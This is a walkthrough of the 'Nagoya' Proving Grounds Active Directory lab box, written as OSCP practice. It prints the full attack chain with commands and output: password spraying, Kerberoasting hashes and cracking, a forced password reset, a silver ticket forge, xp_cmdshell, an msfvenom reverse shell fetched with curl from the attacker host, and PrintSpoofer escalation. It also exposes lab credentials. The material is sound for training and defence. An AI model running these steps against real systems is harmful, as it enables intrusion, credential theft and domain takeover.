Proving Grounds Practice box Nagoya is rated hard, but the community has rated it as very hard. The rating aside, this box is exceptional practice for Active Directory for the OSCP exam. The initial foothold was a bit challenging, and definitely earned the community’s rating. That being said, let’s crack into it.

— NMAP Scan

makoyi@kali 26/03/26 [~] 
❯ sudo nmap -Pn -n 192.168.185.21 -sC -sV -p- --open
[sudo] password for makoyi: 
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-26 12:23 -0500
Nmap scan report for 192.168.185.21
Host is up (0.081s latency).
Not shown: 65512 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Nagoya Industries - Nagoya
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-03-26 17:27:31Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: nagoya-industries.com, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-03-26T17:29:01+00:00; 0s from scanner time.
| ssl-cert: Subject: commonName=nagoya.nagoya-industries.com
| Not valid before: 2026-03-25T17:21:30
|_Not valid after:  2026-09-24T17:21:30
| rdp-ntlm-info: 
|   Target_Name: NAGOYA-IND
|   NetBIOS_Domain_Name: NAGOYA-IND
|   NetBIOS_Computer_Name: NAGOYA
|   DNS_Domain_Name: nagoya-industries.com
|   DNS_Computer_Name: nagoya.nagoya-industries.com
|   DNS_Tree_Name: nagoya-industries.com
|   Product_Version: 10.0.17763
|_  System_Time: 2026-03-26T17:28:22+00:00
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49675/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49676/tcp open  msrpc         Microsoft Windows RPC
49678/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  msrpc         Microsoft Windows RPC
49698/tcp open  msrpc         Microsoft Windows RPC
49717/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: NAGOYA; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2026-03-26T17:28:22
|_  start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 353.54 seconds

Alright, so the first couple of things that pop out are port 80, hosting the website, port 135 for rpc, and port 5985 for winrm. Let’s start with taking a look at the web server hosted on port 80. There wasn’t much on the main page, but the Team link at the top drew my attention.

First thing I did here was created a user list with a format of firstname.Lastname.

matthew.Harrison
emma.Miah
rebecca.Bell
scott.Gardner
terry.Edwards
holly.Matthews
anne.Jenkins
brett.Naylor
melissa.Mitchell
craig.Carr
fiona.Clark
patrick.Martin
kate.Watson
kirsty.Norris
andrea.Hayes
abigail.Hughes
melanie.Watson
frances.Ward
sylvia.King
wayne.Hartley
iain.White
joanna.Wood
bethan.Webster
elaine.Brady
christopher.Lewis
megan.Johnson
damien.Chapman
joanne.Lewis

The second thing, was to create a password list to try out. If you look down at the bottom of the team page, you’ll see that the website was created in 2023, and without any other context to use, I created a password list of the seasons combined with 2023.

Spring2023
Summer2023
Fall2023
Winter2023

Now that we had a user and password list, it’s time to see if anyone used those credentials.

makoyi@kali 26/03/26 [~] 
❯ crackmapexec smb 192.168.185.21 -u users -p pass --continue-on-success             
SMB         192.168.185.21  445    NAGOYA           [*] Windows 10 / Server 2019 Build 17763 x64 (name:NAGOYA) (domain:nagoya-industries.com) (signing:True) (SMBv1:False)
<snip>
SMB         192.168.185.21  445    NAGOYA           [+] nagoya-industries.com\craig.Carr:Spring2023
<snip>
SMB         192.168.185.21  445    NAGOYA           [+] nagoya-industries.com\fiona.Clark:Summer2023
<snip>

Luckily for us, we got two accounts that have bad password practice. Using fiona.Clark’s credentials, let’s check smb and see if we can find anything.

Nothing in particular sticks out, so now let’s just check the shares to see if there’s anything interesting.

Through enumeration, we find an interesting executable, ResetPassword.exe. Using ghidra, let’s see if there’s any information that we can use.

- File -> New Project
- File -> Import File ResetPassword.exe
- Open Code-Browser
- Drag the .exe file to Code-Browser
- Analyze
- Window -> Defined Strings

Alright, now we have a service account and credential. Just to double back, and make sure there was nothing I missed, I’m going to run impacket-GetUserSPNs to see if there’s any other accounts I can grab.

makoyi@kali 26/03/26 [~] 
❯ impacket-GetUserSPNs -dc-ip 192.168.185.21 nagoya-industries.com/fiona.Clark:Summer2023 -request
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
ServicePrincipalName                Name          MemberOf                                          PasswordLastSet             LastLogon                   Delegation 
----------------------------------  ------------  ------------------------------------------------  --------------------------  --------------------------  ----------
http/nagoya.nagoya-industries.com   svc_helpdesk  CN=helpdesk,CN=Users,DC=nagoya-industries,DC=com  2023-04-30 02:31:06.190955  <never>                                
MSSQL/nagoya.nagoya-industries.com  svc_mssql                                                       2023-04-30 02:45:33.288595  2024-08-03 12:48:01.815298             
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_helpdesk$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_helpdesk*$47a9f7afd5e978d5f965285586ca527f$4be7210deca8ba7ba83006fbac2e64c96f17bedbee9d1746f1931243756c11ac47a57c316ba9b81080a1853f18816a92261ec67fc4599e51b23f4addeddd23153ecd8af464ea069f281cae731694eb338db4cac6aea6250664f732ac972d578223ff90c465fc134b39e9fce885c10c1c86e02d2aafc5a3a6c6871cdcd830feb0a4ab8698be3ba918000811f7c894f5f5d39520c0dcb6ac2d0857918521b193a51c3307edb7b1aa155e1504d635aa154094f66737a6e131d543e860c12ec95723cf02f0f65b374c12cab8775a5e4c3b6f7af01d834d3493a8438a59ff9e29838e64defee6ccee3d0b97bfcf649aa4e3c602d955a65a5087bf046c28d658b033664ff853eb6495e59b35918db139888cb93fe0f7ad67b0664bd96ddc1d70e168c8770915cba96551993f83a27f6c2737b09025da3ae5241fefd116d580da01e4733cdc9477702acae4c94590ea9eaf9c6a00d88f6f06763060f6986ccbe4315df1a739708cfd795d1f5bf5aea32c4fc4329884ebfe8aae68a7d3a85248a38871c7865a04567be81c942c6dd484d0032b1c09e5d2d27e41f000df39a81b17d4ccb8dae970704e695c80d743b3533cbcd31fc6e928733fb7b2300197a19e35e2c8adeaf986c7cd2e7b40a684562ef295539e8557d172c1ad46820852e7cd5b1f5f75bbdcccae72f7555878294aaadd34988e3ad4b3cffaeea9c459fc266347557dd8e28d8cea34c45b476ee6eeec2ecbcacb123b192004b7682ddb0bab8a392a96ca1ad3ef31b2edeb3de0c9f01bf371542312a74a186d56a783b824a9ea6ea4c774ef71b60565249ec7651d341b987ef3a2de0894f1c30f467a83db7a42201204ed17242fba2731737a8346e4b82367dd8b0980a86e54b34f27e3d2603349f2f2a9b1b6c34e95356a4ec01a6cb8c1368ee617c30fda0495de764f464181192b0520713ad1c8edba906f70e19af9968ac050d9a34302e97a3f934cd42b62c6b7544e0f8a915555b0b4e01f604d68da69ab4cda383b1f3cb53308de18d8ab52643334c3d2c54082e97486db01029a55eb41a4c86bdab914d0cdd39fae37134da86c634f4978485934324e9a0101e3e905ccba9fff9d2a6b0d9eeed58b5274bd8be235ef05938ac4da93924caec6cbc34c8974d0acf534b6d9274e41bbf364730af2f75073ec17f2a5d75b39bf3aa10ec13e71505a22583af1598571d58df071f8ed7193caceab062605cfe93a86f5a052b0adf3a0690c2ef83b1db2b7111a4b71e5705ded050fd77a82f8d9f70cee1342473507fc08571501636eebf43a226f7040034b74da996fad2356ba83e5ae1e6427e9d781d3fc99326ae0e976b35025a431bf240fa9604040c6b24fa28f883aec7566a13ded34a8e1e155847b397433be69ce509fe25ca42790ad95416623c7a92987cddeaaf151ad26e4868b6aa4ff6a45cfdb9cf8cf04eede6558060a9fee76b9d37dccb71989257fd9b6010d0bcf9c08652b10265cd8fbc2d30929b45fe6979c9ab109bdd958f9b10e13641496b093f5c447e301fe48eb125662dbc271724e670102e665bddb5100c26423bda4221850c65e9d5d4554d6313dd16e966d114b2ecd503f8a9b6b79d129f1b75228d504a4157d
$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*$613500debadca60e20acc2d544d88687$57c4644f5d1dd9559691c1d0d113d7d2802ba93633450faef226bb5ccdf05d225cbf79489578c31c60a4c71fc06e981ef433a51debd1a7937b4e4e770d6fa0b467804d8579cccd9d8b49a75245fc14a3828026637d1247a24d7c82cb515f0a8b7734c20f1a2740436dc43f6f3be4121c1a2f7bc64fcf7cdf4d39dd6b55a1ac6e74db48987c003352ef5ae7878a280daf98228f79f6415f0a95935a4b3a669b79003cc1a2a1484fc52c5b4977f8a1ddbe505a44df0dce8ed2c82fcf25742245de5150cb0603fdd6ecc4410304b1ef838ad67033d170194eeb5db4cd98cb2b6e4b0af7abc5f4ead409064d9ec511db8684f66b2e254dc479feefce184b1d3f0a9b240a0f44e8cf4fb68239f3744c8ef563b233490004de3f7a4f91cf445bd7a0dd88f611eb1019311a902ec82780cbc5895690606cdf328409a8a0e5919fdda9bd032834461900e096daa38bfdcbfe0268e2016c8a5791bec9fe51fdb55bf0ecd689a1df83bf789e11c8cf8724610fdadf87412b20f64265a59e417e5e8ead7d8e348f7e88c0db7178f0cb5121125d5034858bed3b0bc449a8e0934e27c1b9fc97c8826e8a3f15c88faf3b1f333b3c6d2262e13ccc4bc4874e335823d1ecc0716347f94906a91d68c48f8c59b1ad4883bec665f712a6d0b430f8f2727dbe96ea0007c72e6857eb90228b6a517b978a51a1d8994d1da0f1103a08776a646e318d938c29b2f01fb9a4c04975bbb2e17d9bbe149635a8066c127028636bbed5fe05de6ca392b61f09790e2f56bf1b063c5ea3cd051f77090d7c23f0a67f5a9e43d70326373150e4aa3bad8ccd56ef00a1803da101d6b4ab4e177f74a016815eb23656ce4a46c7b9fd1c33d72981bd41c3223d98a42051e1e046d32fe6165a847620582aa1b99c0bb62bd9d4a1fba60befaea19643107f08a6750653c62108224b82e89f927566f48ed65d9e778b4a9cde74875239aec180628487ffb198027a4ed5998a9ba1469b1ae0c76335c132e48d14bbfbdc7b4a1ff7a9a710d6be55ac3005c1cf88c41a721b78cca8a04487497802724ca1b6577810fe80e98b6e1e3ede13aaab43e3ee780f3dc0f70fa294f9319c62c508e0a3f47a48a5e8aaaed1b5ce036751a041ef546466ecdfd334f40b94dd3284ef876a3aebe05c53a070959b4a07d4f6c8bdf60337a3ec3b8bcde3c4172d39126f574c42d34d56ae3ff89c59b072b0a82e0fcb4b5cec64b9be0f531a62c8cc6f198d788f435cac605483d4fec8eddf6d852fce259c8f20f742b421f4c0dc2761e19e8edacdd0aebe83b4101b4dc994e2217476d3ba38ff5183918b48425fbe7cac0060656959a511e1e4bddf0919d9c0e5aaa4595980110a17733e0d6c2a85f2151146700023425e98ee228c870e912e69d352cf2339172deb92e2963529b9f4bfbcf8e9c23b2db58d5446fff39c287c947112236729845a042eac44f7447db73478b04004cbd48f29d68997e3ecccd23f252dd1dc8776a284327beb7272b74272cf341598816e6715082e704a70a05fc74033e28192254481a29121ba4f4c29d3be7c37a3e57c9179ec386043c90b222395ef78bb54a17cd31927354c1afb329a574985f6719a2176b4fb81c897d57e

We find two accounts and hashes, so now it’s time to save those as a file and use hashcat to crack it.

makoyi@kali 26/03/26 [~] 
❯ hashcat hash /usr/share/wordlists/rockyou.txt                                             
hashcat (v7.1.2) starting in autodetect mode
<snip>
13100 | Kerberos 5, etype 23, TGS-REP | Network Protocol
<snip>
$krb5tgs$23$*svc_mssql$NAGOYA-INDUSTRIES.COM$nagoya-industries.com/svc_mssql*$613500debadca60e20acc2d544d88687$57c4644f5d1dd9559691c1d0d113d7d2802ba93633450faef226bb5ccdf05d225cbf79489578c31c60a4c71fc06e981ef433a51debd1a7937b4e4e770d6fa0b467804d8579cccd9d8b49a75245fc14a3828026637d1247a24d7c82cb515f0a8b7734c20f1a2740436dc43f6f3be4121c1a2f7bc64fcf7cdf4d39dd6b55a1ac6e74db48987c003352ef5ae7878a280daf98228f79f6415f0a95935a4b3a669b79003cc1a2a1484fc52c5b4977f8a1ddbe505a44df0dce8ed2c82fcf25742245de5150cb0603fdd6ecc4410304b1ef838ad67033d170194eeb5db4cd98cb2b6e4b0af7abc5f4ead409064d9ec511db8684f66b2e254dc479feefce184b1d3f0a9b240a0f44e8cf4fb68239f3744c8ef563b233490004de3f7a4f91cf445bd7a0dd88f611eb1019311a902ec82780cbc5895690606cdf328409a8a0e5919fdda9bd032834461900e096daa38bfdcbfe0268e2016c8a5791bec9fe51fdb55bf0ecd689a1df83bf789e11c8cf8724610fdadf87412b20f64265a59e417e5e8ead7d8e348f7e88c0db7178f0cb5121125d5034858bed3b0bc449a8e0934e27c1b9fc97c8826e8a3f15c88faf3b1f333b3c6d2262e13ccc4bc4874e335823d1ecc0716347f94906a91d68c48f8c59b1ad4883bec665f712a6d0b430f8f2727dbe96ea0007c72e6857eb90228b6a517b978a51a1d8994d1da0f1103a08776a646e318d938c29b2f01fb9a4c04975bbb2e17d9bbe149635a8066c127028636bbed5fe05de6ca392b61f09790e2f56bf1b063c5ea3cd051f77090d7c23f0a67f5a9e43d70326373150e4aa3bad8ccd56ef00a1803da101d6b4ab4e177f74a016815eb23656ce4a46c7b9fd1c33d72981bd41c3223d98a42051e1e046d32fe6165a847620582aa1b99c0bb62bd9d4a1fba60befaea19643107f08a6750653c62108224b82e89f927566f48ed65d9e778b4a9cde74875239aec180628487ffb198027a4ed5998a9ba1469b1ae0c76335c132e48d14bbfbdc7b4a1ff7a9a710d6be55ac3005c1cf88c41a721b78cca8a04487497802724ca1b6577810fe80e98b6e1e3ede13aaab43e3ee780f3dc0f70fa294f9319c62c508e0a3f47a48a5e8aaaed1b5ce036751a041ef546466ecdfd334f40b94dd3284ef876a3aebe05c53a070959b4a07d4f6c8bdf60337a3ec3b8bcde3c4172d39126f574c42d34d56ae3ff89c59b072b0a82e0fcb4b5cec64b9be0f531a62c8cc6f198d788f435cac605483d4fec8eddf6d852fce259c8f20f742b421f4c0dc2761e19e8edacdd0aebe83b4101b4dc994e2217476d3ba38ff5183918b48425fbe7cac0060656959a511e1e4bddf0919d9c0e5aaa4595980110a17733e0d6c2a85f2151146700023425e98ee228c870e912e69d352cf2339172deb92e2963529b9f4bfbcf8e9c23b2db58d5446fff39c287c947112236729845a042eac44f7447db73478b04004cbd48f29d68997e3ecccd23f252dd1dc8776a284327beb7272b74272cf341598816e6715082e704a70a05fc74033e28192254481a29121ba4f4c29d3be7c37a3e57c9179ec386043c90b222395ef78bb54a17cd31927354c1afb329a574985f6719a2176b4fb81c897d57e:Service1
Approaching final keyspace - workload adjusted.           

Alright, another service account’s credentials, now it’s time to see what we can access with these two accounts. Looking at the NMAP scan again, shows that port 1433 for MSSQL is closed. So let’s start with svc_helpdesk to see what we can find.

I figured being the helpdesk account, that it probably has permissions as a remote user, so I tried the credentials with rpcclient first.

makoyi@kali 26/03/26 [~] 
❯ rpcclient -U nagoya-industries/svc_helpdesk 192.168.185.21
Password for [NAGOYA-INDUSTRIES\svc_helpdesk]:U299iYRmikYTHDbPbxPoYYfa2j4x4cdg
rpcclient $> enumusers
command not found: enumusers
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[svc_helpdesk] rid:[0x450]
<snip>
user:[Christopher.Lewis] rid:[0x46c]
<snip
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[employees] rid:[0x451]
group:[helpdesk] rid:[0x466]
group:[developers] rid:[0x46a]

Alright, my hunch was correct and we can log in. We take a look at the users and groups first, and then we see what groups these users are in. After looking at every account, we find that Christopher.Lewis is the only user that is in three groups, he is also inside of the developers group.

Using the helpdesk’s privileges, we go ahead and change Christopher.Lewis’s password.

rpcclient $> setuserinfo christopher.lewis 23 'Password123'

After, let’s check the credentials and see if we can log in winrm.

makoyi@kali 26/03/26 [~] 
❯ crackmapexec winrm 192.168.185.21 -u christopher.Lewis -p Password123
SMB         192.168.185.21  5985   NAGOYA           [*] Windows 10 / Server 2019 Build 17763 (name:NAGOYA) (domain:nagoya-industries.com)
HTTP        192.168.185.21  5985   NAGOYA           [*] http://192.168.185.21:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from cryptography.hazmat.primitives.ciphers.algorithms in 48.0.0.
  arc4 = algorithms.ARC4(self._key)
WINRM       192.168.185.21  5985   NAGOYA           [+] nagoya-industries.com\christopher.Lewis:Password123 (Pwn3d!)

Success. Once logged in, you can find the local.txt file at C:\local.txt.

Looking around, we find that the only other users on the machine are Administrator and svc_mssql. We already have the password for svc_mssql, so I went that route first. I figured that it might be too easy to log right into the account in winrm, but I tried it anyway, and was right. Next, let’s check if there’s any services running on an internal network.

Now that we’ve found MSSQL running, lets transfer chisel over and set up a tunnel for it.

makoyi@kali 26/03/26 [~] 
❯ ./chisel_linux server --reverse --socks5
2026/03/26 14:55:37 server: Reverse tunnelling enabled
2026/03/26 14:55:37 server: Fingerprint crbGWRGGrMs6oTZ0SDFqZiF9muFw7anjx8UlAvmOH1o=
2026/03/26 14:55:37 server: Listening on http://0.0.0.0:8080
2026/03/26 14:56:16 server: session#1: tun: proxy#R:127.0.0.1:1080=>socks: Listening

*Evil-WinRM* PS C:\Users\Christopher.Lewis\Downloads> .\chisel.exe client <ATTACKER IP>:8080 R:socks

I logged into svc_mssql, but couldn’t find anything useful, so I changed direction and used the credentials to forge a silver ticket to attempt to escalate to a more privileged account. I used https://codebeautify.org/ntlm-hash-generator to turn the password for svc_mssql into a hash, but you can choose any way you’d like. For the domain-sid, you can use powershell and the command Get-ADdomain, but I had ran enum4linux early in my enumeration phase and got the domain-sid.

To grab the SPN

Get-ADUser -Filter {SamAccountName -eq "svc_mssql"} -Properties ServicePrincipalNames

makoyi@kali 26/03/26 [~] 
❯ impacket-ticketer -nthash E3A0168BC21CFB88B95C954A5B18F57C -domain-sid S-1-5-21-1969309164-1513403977-1686805993 -domain nagoya-industries.com -spn MSSQL/nagoya.nagoya-industries.com -user-id 500 Administrator
Impacket v0.14.0.dev0 - Copyright Fortra, LLC and its affiliated companies 
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for nagoya-industries.com/Administrator
[*]     PAC_LOGON_INFO
[*]     PAC_CLIENT_INFO_TYPE
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Signing/Encrypting final ticket
[*]     PAC_SERVER_CHECKSUM
[*]     PAC_PRIVSVR_CHECKSUM
[*]     EncTicketPart
[*]     EncTGSRepPart
[*] Saving ticket in Administrator.ccache

Now we need to export the ticket for use.

makoyi@kali 26/03/26 15:57 - 192.168.45.248 [~] 
❯ export KRB5CCNAME=$PWD/Administrator.ccache

Now create /etc/krb5user.conf

[libdefaults]
        default_realm = NAGOYA-INDUSTRIES.COM
        kdc_timesync = 1
        ccache_type = 4
        forwardable = true
        proxiable = true
    rdns = false
    dns_canonicalize_hostname = false
        fcc-mit-ticketflags = true
[realms]        
        NAGOYA-INDUSTRIES.COM = {
                kdc = nagoya.nagoya-industries.com
        }
[domain_realm]
        .nagoya-industries.com = NAGOYA-INDUSTRIES.COM

Log in to nagoya.nagoya-industries.com and enable xp_cmdshell.

makoyi@kali 26/03/26 [~] 
❯ proxychains impacket-mssqlclient 'nagoya-industries.com/svc_mssql':'Service1'@192.168.185.21 -windows-auth
makoyi@kali 26/03/26 [~] 
❯ proxychains impacket-mssqlclient -k nagoya.nagoya-industries.com
<snip>
SQL (NAGOYA-IND\Administrator  dbo@master)> EXEC sp_configure 'show advanced options', 1;
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator  dbo@master)> RECONFIGURE;
SQL (NAGOYA-IND\Administrator  dbo@master)> EXEC sp_configure 'xp_cmdshell', 1;
INFO(nagoya\SQLEXPRESS): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (NAGOYA-IND\Administrator  dbo@master)> RECONFIGURE;

After enabling xp_cmdshell, I used msfvenom to craft an executable payload that initiates a reverse shell connection

makoyi@kali 26/03/26 [~] 
❯ msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.248 LPORT=445 -f exe -o rev.exe

Now we transfer the file over to the machine.

SQL (NAGOYA-IND\Administrator  dbo@master)> xp_cmdshell "curl http://<ATTACKER IP>/rev.exe -o C:\temp\rev.exe"

With a listener set up through netcat, we execute the payload and gain a reverse shell.

makoyi@kali 26/03/26 ~] 
❯ sudo rlwrap -cAr nc -lvnp 445                             
[sudo] password for makoyi: 
listening on [any] 445 ...
connect to [<ATTACKER IP>] from (UNKNOWN) [192.168.185.21] 50068
Microsoft Windows [Version 10.0.17763.4252]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nagoya-ind\svc_mssql

Checking the permissions of the account, we find that SeImpersonate is enabled, which means we can use PrintSpoofer to escalate to Administrator.

After transfering PrintSpoofer64.exe over, we escalate to Administrator and find proof.txt at C:\Users\Administrator\Desktop\proof.txt.

C:\>\Temp\PrintSpoofer64.exe -i -c cmd.exe
\Temp\PrintSpoofer64.exe -i -c cmd.exe
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.17763.4252]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>type C:\Users\Administrator\Desktop\proof.txt
type C:\Users\Administrator\Desktop\proof.txt

Thank you for reading.

I hope this walk-through helps, stay ethical, and happy hacking.